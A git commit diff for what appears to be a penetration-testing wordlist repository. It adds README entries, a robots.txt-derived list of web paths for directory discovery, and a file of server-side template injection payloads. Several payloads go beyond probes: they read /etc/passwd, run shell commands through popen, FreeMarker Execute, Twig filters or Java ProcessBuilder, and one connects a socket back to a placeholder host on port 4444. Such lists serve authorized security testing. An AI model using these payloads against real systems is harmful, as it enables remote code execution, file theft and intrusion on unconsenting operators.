Added some new wordlists (#4)

Co-authored-by: Krypton <root@krypton.ninja>

README.md

@@ -28,10 +28,12 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
   <details>
   <summary>Directory Scanners</summary>
   <ul>
+    <li><a href="directory_scanner/apache.txt">Apache</a> - 13'232 Lines</li>
     <li><a href="directory_scanner/apache_user_enum_1.0.txt">Apache User Enum 1.0</a> - 8'915 Lines</li>
     <li><a href="directory_scanner/apache_user_enum_2.0.txt">Apache User Enum 2.0</a> - 10'340 Lines</li>
     <li><a href="directory_scanner/big.txt">Big</a> - 20'468 Lines</li>
     <li><a href="directory_scanner/common.txt">Common</a> - 4'612 Lines</li>
+    <li><a href="directory_scanner/conf.txt">Conf</a> - 100'926 Lines</li>
     <li><a href="directory_scanner/directories.txt">Directories</a> - 58'655 Lines</li>
     <li><a href="directory_scanner/directory_list_1.0.txt">Directory List 1.0</a> - 141'693 Lines</li>
     <li><a href="directory_scanner/directory_list_2.3_medium.txt">Directory List 2.3 Medium</a> - 220'545 Lines</li>
@@ -39,8 +41,12 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
     <li><a href="directory_scanner/directory_list_lowercase_2.3_medium.txt">Directory List Lowercase 2.3 Medium</a> - 207'628 Lines</li>
     <li><a href="directory_scanner/directory_list_lowercase_2.3_small.txt">Directory List Lowercase 2.3 Small</a> - 81'628 Lines</li>
     <li><a href="directory_scanner/extensions_common.txt">Extensions Common</a> - 27 Lines</li>
+    <li><a href="directory_scanner/fuzz_php_special.txt">Fuzz PHP Special</a> - 136'921 Lines</li>
     <li><a href="directory_scanner/indexes.txt">Indexes</a> - 9 Lines</li>
     <li><a href="directory_scanner/joomla.txt">Joomla</a> - 1'543 Lines</li>
+    <li><a href="directory_scanner/jsp.txt">JSP</a> - 92'216 Lines</li>
+    <li><a href="directory_scanner/most_common.txt">Most Common</a> - 1'011 Lines</li>
+    <li><a href="directory_scanner/robotx.txt">Robots</a> - 990 Lines</li>
     <li><a href="directory_scanner/sensitive_files_unix.txt">Sensitive Files Unix</a> - 15 Lines</li>
     <li><a href="directory_scanner/sensitive_files_win.txt">Sensitive Files Windows</a> - 6 Lines</li>
     <li><a href="directory_scanner/top_subdomains.txt">Top Subdomains</a> - 114'531 Lines</li>
@@ -324,6 +330,7 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
     <li><a href="vulnerabilities/jboss.txt">JBoss</a> - 18 Lines</li>
     <li><a href="vulnerabilities/jersey.txt">Jersey</a> - 120 Lines</li>
     <li><a href="vulnerabilities/jrun.txt">JRun</a> - 12 Lines</li>
+    <li><a href="vulnerabilities/juicy_files.txt">Juicy Files</a> - 187'964 Lines</li>
     <li><a href="vulnerabilities/netware.txt">NetWare</a> - 59 Lines</li>
     <li><a href="vulnerabilities/oracle.txt">Oracle</a> - 1'074 Lines</li>
     <li><a href="vulnerabilities/ror.txt">ROR</a> - 120 Lines</li>
@@ -331,6 +338,7 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
     <li><a href="vulnerabilities/sharepoint.txt">SharePoint</a> - 1'707 Lines</li>
     <li><a href="vulnerabilities/sql_inj.txt">SQL Injections</a> - 40 Lines</li>
     <li><a href="vulnerabilities/sql.txt">SQL</a> - 125 Lines</li>
+    <li><a href="vulnerabilities/ssti.txt">SSTI</a> - 107 Lines</li>
     <li><a href="vulnerabilities/sunas.txt">Sunas</a> - 50 Lines</li>
     <li><a href="vulnerabilities/tests.txt">Test</a> - 32 Lines</li>
     <li><a href="vulnerabilities/tomcat.txt">Tomcat</a> - 86 Lines</li>
@@ -346,10 +354,12 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
 <hr>
 
 * Directory Scanners
+  * [Apache](directory_scanner/apache.txt) - 13'232 Lines
   * [Apache User Enum 1.0](directory_scanner/apache_user_enum_1.0.txt) - 8'915 Lines
   * [Apache User Enum 2.0](directory_scanner/apache_user_enum_2.0.txt) - 10'340 Lines
   * [Big](directory_scanner/big.txt) - 20'468 Lines
   * [Common](directory_scanner/common.txt) - 4'612 Lines
+  * [Conf](directory_scanner/conf.txt) - 100'926 Lines
   * [Directories](directory_scanner/directories.txt) - 58'655 Lines
   * [Directory List 1.0](directory_scanner/directory_list_1.0.txt) - 141'693 Lines
   * [Directory List 2.3 Medium](directory_scanner/directory_list_2.3_medium.txt) - 220'545 Lines
@@ -357,8 +367,12 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
   * [Directory List Lowercase 2.3 Medium](directory_scanner/directory_list_lowercase_2.3_medium.txt) - 207'628 Lines
   * [Directory List Lowercase 2.3 Small](directory_scanner/directory_list_lowercase_2.3_small.txt) - 81'628 Lines
   * [Extensions Common](directory_scanner/extensions_common.txt) - 27 Lines
+  * [Fuzz PHP Special](directory_scanner/fuzz_php_special.txt) - 136'921 Lines
   * [Indexes](directory_scanner/indexes.txt) - 9 Lines
   * [Joomla](directory_scanner/joomla.txt) - 1'543 Lines
+  * [JSP](directory_scanner/jsp.txt) - 92'216 Lines
+  * [Most Common](directory_scanner/most_common.txt) - 1'011 Lines
+  * [Robots](directory_scanner/robots.txt) - 990 Lines
   * [Sensitive Files Unix](directory_scanner/sensitive_files_unix.txt) - 15 Lines
   * [Sensitive Files Windows](directory_scanner/sensitive_files_win.txt) - 6 Lines
   * [Top Subdomains](directory_scanner/top_subdomains.txt) - 114'531 Lines
@@ -587,6 +601,7 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
   * [JBoss](vulnerabilities/jboss.txt) - 18 Lines
   * [Jersey](vulnerabilities/jersey.txt) - 120 Lines
   * [JRun](vulnerabilities/jrun.txt) - 12 Lines
+  * [Juicy Files](vulnerabilities/juicy_files.txt) - 187'964 Lines
   * [NetWare](vulnerabilities/netware.txt) - 59 Lines
   * [Oracle](vulnerabilities/oracle.txt) - 1'074 Lines
   * [ROR](vulnerabilities/ror.txt) - 120 Lines
@@ -594,6 +609,7 @@ If you already have a wordlist ready to be adeded, make sure to [open a pull req
   * [SharePoint](vulnerabilities/sharepoint.txt) - 1'707 Lines
   * [SQL Injections](vulnerabilities/sql_inj.txt) - 40 Lines
   * [SQL](vulnerabilities/sql.txt) - 125 Lines
+  * [SSTI](vulnerabilities/ssti.txt) - 107 Lines
   * [Sunas](vulnerabilities/sunas.txt) - 50 Lines
   * [Test](vulnerabilities/tests.txt) - 32 Lines
   * [Tomcat](vulnerabilities/tomcat.txt) - 86 Lines

directory_scanner/robots.txt

@@ -0,0 +1,990 @@
+/1000paket
+/1000perex.php
+/1000p.php
+/1000prosm
+/1000prosm.php
+/1000rassil
+/1000rassil.php
+/1000servis.php
+/1000text.php
+/13629693
+/2012.php
+/404.html
+/405.html
+/5let.php
+/7294873
+/about/actions/
+/aboutinformer
+/aboutinformer2.php
+/abuse.php
+*?action
+/*action=ADD2BASKET
+/*action=ADD_TO_COMPARE_LIST
+/*action=BUY
+/*action=DELETE_FROM_COMPARE_LIST
+/active.php
+/*act=viewinfo*
+*add*
+/addnews.html
+/*add_search=*
+/*?adm
+/admin
+/admin*
+/admin/
+/admin2.php
+/administrator/
+/admin.php
+admin.php
+/advert.php
+/aff-bin
+/affiche.php
+/*ajax=
+/ajax/
+/ajax.php
+/amy695806155/
+/annuaire-professio/
+/api
+/api/
+/api.php
+/appointment/
+/apps/
+/archive/
+arch.php
+/asc/
+/*.asp*
+/*.aspx$
+/attachment/
+/auth/
+/author
+/auth.php
+/*auth=yes
+/*back_url=*
+/*backurl=*
+/*BACK_URL=*
+/*BACKURL=*
+/*back_url_admin=*
+/banks/request
+/bank/upload.php
+/basket/
+/basket/add/*
+/bbs/admin.php
+/bbs/api/
+/bbs/api.php
+/bbs/config/
+/bbs/data/
+/bbs/forum.php?mod=post*
+/bbs/forum.php?mod=redirect*
+/bbs/home.php?mod=spacecp*
+/bbs/install/
+/bbs/member.php
+/bbs/misc.php
+/bbs/search.php
+/bbs/source/
+/bbs/static/
+/bbs/template/
+/bbs/uc_client/
+/bbs/uc_server/
+/bin.aspx?ID*
+/*bitrix_*=
+/bitrix/
+/blank_paket2.php
+/blank_paket.php
+/blocks/
+/blogs
+/board/
+/b-product
+/b-product*
+*/brand-/*
+/*?brand_
+/bundles/*
+/cabinet
+/cache/
+/captcha.php
+/cars/question/
+/cart
+/cart/
+/catalog/
+/catalog/alert.aspx
+/catalog/default.aspx
+/catalog/drugstore.aspx
+/catalog/product_compare/
+/catalog/raion.aspx
+/catalog/search*.aspx
+/catalog/spravochnaia-aptek.aspx
+/catégorie/
+/category/
+/cert/
+/cgi-bin
+/cgi-bin/
+/CHANGELOG.txt
+/*change_password=yes
+/chatgatewaycounts/
+/chatping/
+/checkout
+/*Chld
+/ck.php
+/click.php
+/club/$
+/club/forum/search/
+/club/gallery/tags/
+/club/group/search/
+/club/log/
+/club/messages/
+/club/search/
+/cmdynet
+/cmedianet
+/cms/FR-FR/pneu-4x4/pneu/4x4/ATTURO/BF-GOODRICH/ALL-TERRAIN-T-A-KO.html
+/cms/FR-FR/pneu-4x4/pneu/4x4/BF-GOODRICH/BRIDGESTONE/DUELER-A-T-694.html
+/cms/FR-FR/pneu-4x4/pneu/4x4/BRIDGESTONE/BRIDGESTONE/TOYO/INSA-TURBO/HANKOOK/BF-GOODRICH/INSA-TURBO/RANGER.html
+/cms/FR-FR/pneu-4x4/pneu/4x4/HANKOOK/HANKOOK/DYNAPRO-MT-RT03.html
+/cms/FR-FR/pneu-4x4/pneu/4x4/TOYO/ATTURO/BRIDGESTONE/INSA-TURBO/BRIDGESTONE/ATTURO/AZ800.html
+/cms/FR-FR/pneu-hiver/saison/hiver/HANKOOK/VREDESTEIN/MICHELIN/ALPIN-5.html
+/cms/FR-FR/pneu-hiver/saison/hiver/VREDESTEIN/MICHELIN/X-ICE-XI3.html
+/collection/
+/comment.php
+/comment/reply/
+*/comments
+/comments
+/comments/feed/
+/common/
+/commons/
+/communication/blog/search.php
+/communication/forum/search/
+/communication/forum/user/
+/community/
+/comparemod/$
+/comparemod/*_vs$
+/compare/*_vs$
+/complaint/
+/components/
+/config/
+/connect.php
+/contact/
+/contacts/*
+/content
+/content1
+/content/board/my/
+/content/links/my/
+/counters
+/createcard
+/cron.php
+/csagent/
+/css/
+/cssikexin/
+/cswjjd/
+/customer/
+/cycle_image.php
+/data/
+/db/
+/db/autos.html?r
+/db/autos/*?p
+/delay
+/denunciar-anuncio/
+/deprecated_browser.html
+/detail/
+/*detail.php
+/developpeurs/*
+developpeurs/
+/dle-rules-page.html
+/*do=addnews
+/*do=feedback
+/*do=lastcomments
+/*do=lostpassword
+/*do=pm
+/*do=register
+/doski/
+/doski.php/doski.php
+/doski/senddoski.php
+/doski/sendpismo.php
+/*do=stats
+/download/
+/dynamic
+/email/
+/eng
+/engine/ajax/
+/engine/download.php
+/engine/go.php
+/error/
+/ErrorLog/
+espacepro*
+/estate/firmestate/firm
+/estate/teaseritems
+/e-store/affiliates/
+/e-store/paid/detail.php
+ex:
+/examples/download/download_private/
+/examples/my-components/
+*/?f=*
+/?favorites
+/*?fb_xd_fragment
+/fcmedianet.js
+*/feed
+/feed.php
+/feeds/
+/*filter_sended=
+/filter/tips/
+/final
+/firm/*/*.aspx
+/fonts/
+/*forgot_password=yes
+/forum/admin/
+/forum/cache/
+/forum/cgi-bin/
+/forumcp.php
+/forum/db/
+/forum/language/
+/forum.php?mod=post*
+/forum.php?mod=redirect*
+/*from=adwords
+/*?from=begun
+/*from=mail
+*/from_ya
+/gal/
+/*/gallery/*order=*
+/gallery.php
+/game/*/play
+/games/*/play
+/*gclid
+/*ggl
+/*.gif$
+/go
+/goo2.php
+/goods_script.php
+/goo.php
+/groups
+/hack/
+/help/
+/help.php
+/help.php?
+/home.php?mod=spacecp*
+/how_to_choose/95728/
+/htdocs/
+/*image
+/images/
+/img/
+/*img/managers/docs/
+/imprimer/
+/imprimer/*
+/inc/
+/include
+/include/
+/includes/
+/index
+/index/
+/index$
+/index_dev.php
+/*index.php
+/index.php
+/index.php/
+/*index.php$
+/informer.php
+/info/rules
+/infrastructure/get_geo/
+/ingredients/
+/install
+/install/
+/installation/
+/INSTALL.mysql.txt
+/INSTALL.pgsql.txt
+/install.php
+/INSTALL.sqlite.txt
+/INSTALL.txt
+/interest/
+/ipdata/
+/job.php
+/*.jpg$
+/js/
+/js_no_index/
+/jsp/
+/kabinet.php
+/kredit/id
+/kurs/mforecast/
+/kurs/news/
+/kurs/RSS/
+/kurs/undefined
+/lang/
+*/?lang.ru
+/language/
+/languages/
+/*level=12*
+/?level=12
+/*level=liger*
+/lib/
+/libraries/
+/LICENSE.txt
+/login/
+/login.php
+/*login=yes
+/logout
+/logout/
+/*logout=yes
+/logs/
+/loyalty/
+m.123i.com.br
+/mail/
+/MAINTAINERS.txt
+/manage/
+*mark_id*
+/*maxprice=*
+/media/
+/__media__/js/templates.js
+/mediamainlog.php
+/*member*
+/member/
+/member.php
+/members
+/message.php
+/*minprice=*
+/misc/
+/misc.php
+/mobile/
+/*mobile=yes*
+/*?mod=attachment*
+/mode/
+/*?mode=viewprofile
+/*?mod=misc*
+/modules/
+/?msk
+/mst/cache/images/
+/myauto
+/nalog?calc
+/*name=
+/network/
+/new-b-product
+/new-b-product*
+/new-product
+/new-product*
+/node/add/
+/note
+/notebooks/brand-/
+/notebooks/brand-packard%20bell/
+/obyavi.php
+/offers/buy/
+*/OID_*
+/openapi/
+/*/?_openstat
+/*_openstat
+/*_openstat=
+/*openstat
+/opinion
+/optsale/last/toshiba_qosmio_x500_110.html
+/optsale/last/toshiba_t110_12g.html
+/optsale/last/toshiba_t130_16u.html
+/optsale/last/toshiba_u500_18p.html
+/optsale/last/toshiba_u500_1dq.html
+/optsale/last/toshiba_u500_1f4.html
+/*order=*
+/order
+/order/
+/*orderby=*
+/order-option
+/organiserenquiry
+/out/
+/out.php
+/owners/
+/*/page=
+/page/
+*?page=1
+/*/page-1/
+/page_confirm.asp
+/*PAGE_NAME=detail_slide_show
+/*PAGE_NAME=search
+/*PAGE_NAME=user_post
+/page.php
+/pageRight.html*
+/pages/displayCalculatorV2/
+/pages/interactives/sponsor-story/
+/panier
+/panier.html
+/parapharmacie/pharmacies/
+/parking.php4
+/*Password
+/pay/
+/pay1000/in.php
+/payment/
+/pda/
+/pdd/change/
+/pdd/exam/
+/pdd/init/
+/pdd/random/
+/pdd/themes/
+/pdd/user/stats/
+/*.pdf
+/pdf/
+/pdf.asp
+/*?pdg
+/peradmin/*
+/permalink/
+/personal/
+/personal_ads/
+/perto-de-mim/
+/pharmacies/
+/phb/jfb.htm*
+/phonebook/*.asp?*
+/phonebook/*.asp$
+/photoupload/
+/*.php
+/phpcms
+/phpmailer/
+/phpsso_server
+/p.html
+/pianor/
+/pic/
+/picture-gallery/sponsor-story/
+/*pid=
+/pingrong/
+/player/*
+/plugin.php?id=*
+/plugins/
+/plus/
+/plus/ad_js.php
+/plus/advancedsearch.php
+/plus/carbuyaction.php
+/plus/car.php
+/plus/count.php
+/plus/disdls.php
+/plus/erraddsave.php
+/plus/feedback_js.php
+/plus/list.php?tid=2078
+/plus/list.php?tid=2078&TotalResult=410&PageNo=
+/plus/mytag_js.php
+/plus/posttocar.php
+/plus/recommend.php
+/plus/rss.php
+/plus/search.php
+/plus/shops_buyaction.php
+/plus/stow.php
+/*&pm*
+/*?pm*
+/pm
+/pma/
+/poisk/
+/poiskmainz2.php
+/poll/
+/pomoc-a-kontakt/kontakt/
+/post/*?*
+/post1/
+/post/*.asp?*
+/post/*.asp$
+/post.php
+/pp/
+/price_item.aspx
+/*price_max=
+/*price_min=
+/primer-informers.php
+*/print/
+*print
+/*&print=
+/*?print=
+/*print=
+/*print_course=Y
+/pri_submit.asp
+/private
+/pro/*/biz*
+/pro/*/bizmedia*
+/pro/*/contacts*
+/pro/*/contents*
+/pro/*/date*
+/product/
+/product.ac
+/product/advertisement.html
+/product_by_id/
+/product/company_news/about/legal_notice/supervision/index.html
+/product/company_news/cooperation/company_news/solutions/index.html
+/product/company_news/legal_notice/cooperation/service/index.html
+/product/company_news/legal_notice/supervision/legal_notice/index.html
+/product/company_news/service/company_news/solutions/index.html
+/product/company_news/supervision/company_news/cooperation/policy.html
+/product/cooperation/company_news/service/legal_notice/index.html
+/product/index.aspx
+/product/legal_notice/cooperation/company_news/company_news/index.html
+/product/legal_notice/cooperation/legal_notice/solutions/company_news/20140412v2.html
+/product/legal_notice/cooperation/legal_notice/solutions/company_news/supervision/joinus.html
+/product/legal_notice/cooperation/solutions/about/supervision/product/mall.html
+/product/legal_notice/product/supervision/company_news/index.html
+/product/list.aspx
+/productreview/
+*products
+/products/
+/product/service/service/legal_notice/about/about_us.html
+/product/solutions/solutions/legal_notice/about/index.html
+/produits/
+/produits-de-bar/contact_us.php
+/profile
+/profile/
+/profile.php
+/profiles/
+/pro/*/ldr*
+/pro/*/rating/*
+/pro/*/reserva*
+/psc/
+/psp/
+/psreports/
+/public_html/
+/publish/
+/pw8/
+/pw_ajax.php
+/pw_api.php
+/pw_app.php
+/pwr/123inkjets/pwr/885jwpi5/debug.html
+/pwr/123inkjets/pwr/885jwpi5/rawdata/
+/pwr/4inkjets/pwr/n9kd9e5d/debug.html
+/pwr/4inkjets/pwr/n9kd9e5d/rawdata/
+/pwr/simplyink/pwr/6n66vqj2/debug.html
+/pwr/simplyink/pwr/6n66vqj2/rawdata/
+/?q=*
+/?q=admin/
+/?q=comment/reply/
+/?q=contact/
+/?q=filter/tips/
+/qiche/*.asp?*
+/qiche/*.asp$
+/qiushengzhilu*
+/?q=logout/
+/?q=node/add/
+/qqajax.php
+/qqlive.htm
+/qqlive.html
+/?q=search/
+/quanto-vale-seu-apartamento/passo*
+/quero-comercializar-meu-apartamento/*
+/quero-contribuir-com-informacoes/*
+/*QUERY=
+/quisDizer/
+/?q=user/login/
+/?q=user/logout/
+/?q=user/password/
+/?q=user/register/
+/qy_about.aspx
+/qy_msg.aspx
+/qy_pro.aspx
+/qy_xx.aspx
+/random
+/rd/
+/rd1
+/rd2
+/rd.php*
+/readme.html
+/read.php
+/realty_map_data/
+/receive.php
+/recent/
+/recherche
+/recipes/
+/recommended/
+/redirect
+/redirect/
+/redo_form/
+/referers_list.php
+/regAndAsk.html*
+/region.php
+/*register
+/register/
+/register.html
+/register.php
+/register/vip_pay.html
+/*register=yes
+/related/*
+/rel/q/
+/remittance/
+/report.html
+/require/
+/res/
+/resource/activity/buyingingroup/index.html
+/respond.php
+/result/
+/result.php
+/reviews
+/reviews-Ratings
+/rjs/
+/robot/
+robots.txt
+/rongji/admin/
+/route/
+/rss/
+/rss-feeds/
+/rss.xml
+/rules.html
+/sakura/
+/sales
+/sales/
+/save
+/save-biz*
+/save_data.asp
+/save-pro*
+/scheme
+/school-lunch/*
+/scripts/
+/scripts/iefix.js
+*search*
+/*/search/
+/*search
+/search
+/search*
+/search/
+/search_*
+/search.asp
+/search.asp?word=*
+/search_ds/
+/search_keywords/*
+/search.php
+/searchProduct.ac
+/searchurl/
+/searchurl.php
+/seasons_commu/*
+/secure/
+/securimage/
+/selection_station_de_montage/
+/sell/*?*
+/seminarprojects/tag/
+/send
+/sendcard
+/sendpwd.php
+/sendurl
+/senyang/
+/server/
+/serverList/
+/servicequery
+/services
+/services/
+/services/*
+/servis-za-prodavce/
+/sezioni/1006/test
+/sezioni/1051/prova-diretta
+/sezioni/1269/widget-news
+/sezioni/1292/il-blog-di-leone-dilernia
+/sezioni/1306/ylenia
+/sezioni/1320/primo-piano-app-105
+/sezioni/1343/mobile-layout-test
+/sezioni/1352/html5-webradio
+/sezioni/1363/palinsesto-3-9-agosto
+/sezioni/1366/palinsesto-10-16-agosto
+/sezioni/1367/palinsesto-17-23-agosto
+/sezioni/1369/palinsesto-24-30-agosto
+/sezioni/1423/news-estate
+/sezioni/949/condizioni-generali-dei-servizi-offerti
+/sezioni/976/test-approvazione
+/shangjiahudong
+/share/
+/shengyuan/admin/
+/shimisi/
+/shitou/
+/shop/
+/shop/admin/
+/shopping_cart
+/shoppingcart.html
+/shopping-item/*
+/shop/shopmember/
+/*SHOWALL_1=
+/showerr.asp
+/showpro.aspx
+/signaler-erreur/
+/signaler-erreur/*
+/signin
+/sign-in.html
+/sign-out.html
+/signup
+/signup*
+/simple/
+/sites/
+/sitesearch.asp*
+/sjhd
+/skin/
+/skins/
+/*/slide_show/
+/sms/
+/so/
+/socs.js
+/soft/download.asp
+/soft/download.asp?softid=*
+/softeval.asp?*
+/soft/list.asp
+/soft/list.asp?classid=*
+/soft/previewimg.asp
+/soft/previewimg.asp?softid=*
+*/?sort=*
+/sou-corretor-de-imoveis/
+/source/
+/spider-trap
+/sponsors/
+/*sputprtn
+/src/
+/ssd/
+/ssi/
+/ssl
+/*&st*
+/*?st*
+/s/tao/
+/stars/
+/static
+/static/
+/static/*.html
+/station_ok/
+/statistics.html
+/stats/
+/stats/count
+/store
+/store/*.asp?*
+/store/*.asp$
+/store_n/
+/story/draft/
+/story.php
+/story/sponsor-story/
+/*struct_id=*
+/*subaction=userinfo
+/subcatalog/
+/submit/
+/submit.php
+/*subpart=*
+/suggestion_keywords/autocomplete_suggestion
+/super-product*
+/survey/importCarownerData.aspx
+/survey.php
+/survey/SurveyFiles
+*.swf
+/*.swf
+/sycg2009/
+/sycon/
+/sydh/
+/syjc/
+/sys
+/system/
+/tag
+/tag/
+/tbxl/
+/tel-domain-registration/
+/temp/
+/tempcache/
+/tempImages/
+/template/
+/templates/
+/templets
+/temporada/*?q=
+/temporada/*?r&
+/tentarComprar/*
+/text
+/text/*
+/themes/
+/thread.php
+/thumb.php
+/timetable
+/tmp/
+/tns/
+/today/
+/to.htm?*
+/tools/
+/tools07073
+/top.asp
+/topic/*/smart/
+/top-sellers/
+/topten
+/topusers/
+/topusers.php
+/tourdesc
+/*tourpoisk
+/toutiaohuandeng*
+*/trackback
+/trackback
+/trackback/
+/traf/map/
+/tranergy
+/transfer/
+/translate/
+/translator/
+/travel/$
+/tuan/*.asp?*
+/tuan/*.asp$
+/tupian
+/tupush/
+/tv_stanice_xml/
+/txt*
+/txt1.php
+/txt2.php
+/txt3.php
+/txt4.php
+/ubeogradu.rs/
+/uc
+/ucc
+/uc_client/
+/uc_server/
+/udaup.php
+/ugc/
+/ui/
+/uncategorized/test/
+/update.php
+/updates/
+/upfile/*
+/upgrade/
+/UPGRADE.txt
+/upimg/
+/upload/
+/uploadfiles/
+/upload.php
+/uploads/
+/upvoted/
+/user
+/user/
+/user/*
+/user/.
+/userapp.php?mod=app&*
+/user.asp*
+/userauth/
+/user/login/
+/user/logout/
+/user/password/
+/user.php
+/user/register/
+/users/
+/users/ajax/*
+/users/headermenu
+/users/popup/*
+/usr-bin
+/*utm
+/*utm_campaign=*
+/*utm_content=*
+/*utm_medium=*
+/*utm_source=
+/*utm_source=*
+/uuseeimg/
+/v/
+/v1_home/*
+/v1_popup/*
+/v3_index/wrong.html
+/v3_login/qzonelogin.html
+/v3_specialnr/
+/v5/action/secweborder/
+/v5/PayCenter/
+/v5/weborder/
+/va/
+/velikosrce/
+/version-info/
+/video/
+/video-recepty
+/videos/sponsor-story/
+/*?vidget
+/vietnamese/--------------------------
+*/?view=*
+/viewimg_*
+/view.php
+/views/
+/vip
+/vip/
+/vipcard/
+/visitbelgrade.net/
+/visitbelgrade.rs/
+/visitorregister*
+/vklad/id
+/vocabulary/
+/vodnik/cgi-bin/
+/vodnik/htdocs/
+/vodnik/includes/
+/vodnik/sekret/
+/vodnik/tep/
+/vodnik/tmp/
+/vod-play*.html$
+/vod-search-*
+/vod-show*hits*.html$
+/vod-show-id-*-p-*.html$
+/vod-show*up*.html$
+/vote/
+/w/
+/wagon/admin/
+/wangyingran
+/wap/
+/watch*
+/wb/
+/webchatcce
+/webgame/
+/weborder/
+/webpage/
+/webservices/
+/wed/*.asp?*
+/wed/*.asp$
+/wed_n/
+/week/
+?&what=
+/why/*
+/widget-118218/*
+/widget/head/login
+/wiki/
+/wind/
+/wingBanner/
+/wish/
+/wishlist
+/wishlist/
+/work1
+/*WorkingVersion
+/wp-admin
+/wp-admin/
+/wp-atom.php
+/wp-blog-header.php
+/wp-comments
+/wp-comments-post.php
+/wp-commentsrss2.php
+/wp-config.php
+/wp-content/
+/wp-content/cache
+/wp-content/cache/
+/wp-content/plugins
+/wp-content/plugins/
+/wp-content/themes
+/wp-feed.php
+/wp-includes
+/wp-includes/
+/wp-links-opml.php
+/wp-login.php
+/wp-mail.php
+/wp-pass.php
+/wp-rdf.php
+/wp-register.php
+/wp-rss2.php
+/wp-rss.php
+/wp-settings.php
+/wp-trackback
+/wp-trackback.php
+/write_a_review.php
+/wsauto/admin/
+/wuaiext/
+www2.123i.com.br
+/*x=
+/xd_receiver.htm
+/xhzd/
+/xian/zhuanti
+/xls_redirect/
+/xml
+/xml/
+/xml_feeds/
+/xmlrpc/
+/xmlrpc.php
+/y/
+/*Ya_
+/*?yclid
+/year/
+/yesterday/
+/yjx001/
+/ylyat/
+you
+/youhui/*.asp?*
+/youhui/*.asp$
+/youhui_n/
+/yp/*.asp?*
+/yp/*.asp$
+/yp/my/
+/ypxhmg/
+/ypxomg/
+/ypxrzg/
+/ypxsmg/
+/ywidget
+/yzjj/
+/z/
+/zapomenute_prihlasovaci_udaje.html
+/zhicheng/admin/
+/zhiyucainuan/
+/zhongda/admin/
+/zhuanti/reiz/admin/
+/zoomify/
+/zozm/
+/zrlist.aspx
+/zulin/admin/
+/zxjc/
+/笠勝電子有限公司-找工作機會-68848493.htm

vulnerabilities/SSTI.txt

@@ -0,0 +1,107 @@
+{{4*4}}[[5*5]]
+{{7*7}}
+{{7*'7'}}
+<%= 7 * 7 %>
+${3*3}
+${{7*7}}
+@(1+2)
+#{3*3}
+#{ 7 * 7 }
+{{dump(app)}}
+{{app.request.server.all|join(',')}}
+{{config.items()}}
+{{ [].class.base.subclasses() }}
+{{''.class.mro()[1].subclasses()}}
+{{ ''.__class__.__mro__[2].__subclasses__() }}
+{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
+{{'a'.toUpperCase()}} 
+{{ request }}
+{{self}}
+<%= File.open('/etc/passwd').read %>
+<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+${"freemarker.template.utility.Execute"?new()("id")}
+{{app.request.query.filter(0,0,1024,{'options':'system'})}}
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
+{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
+{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
+{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
+{$smarty.version}
+{php}echo `id`;{/php}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
+{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
+{{request|attr(["_"*2,"class","_"*2]|join)}}
+{{request|attr(["__","class","__"]|join)}}
+{{request|attr("__class__")}}
+{{request.__class__}}
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+${T(java.lang.System).getenv()}
+${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
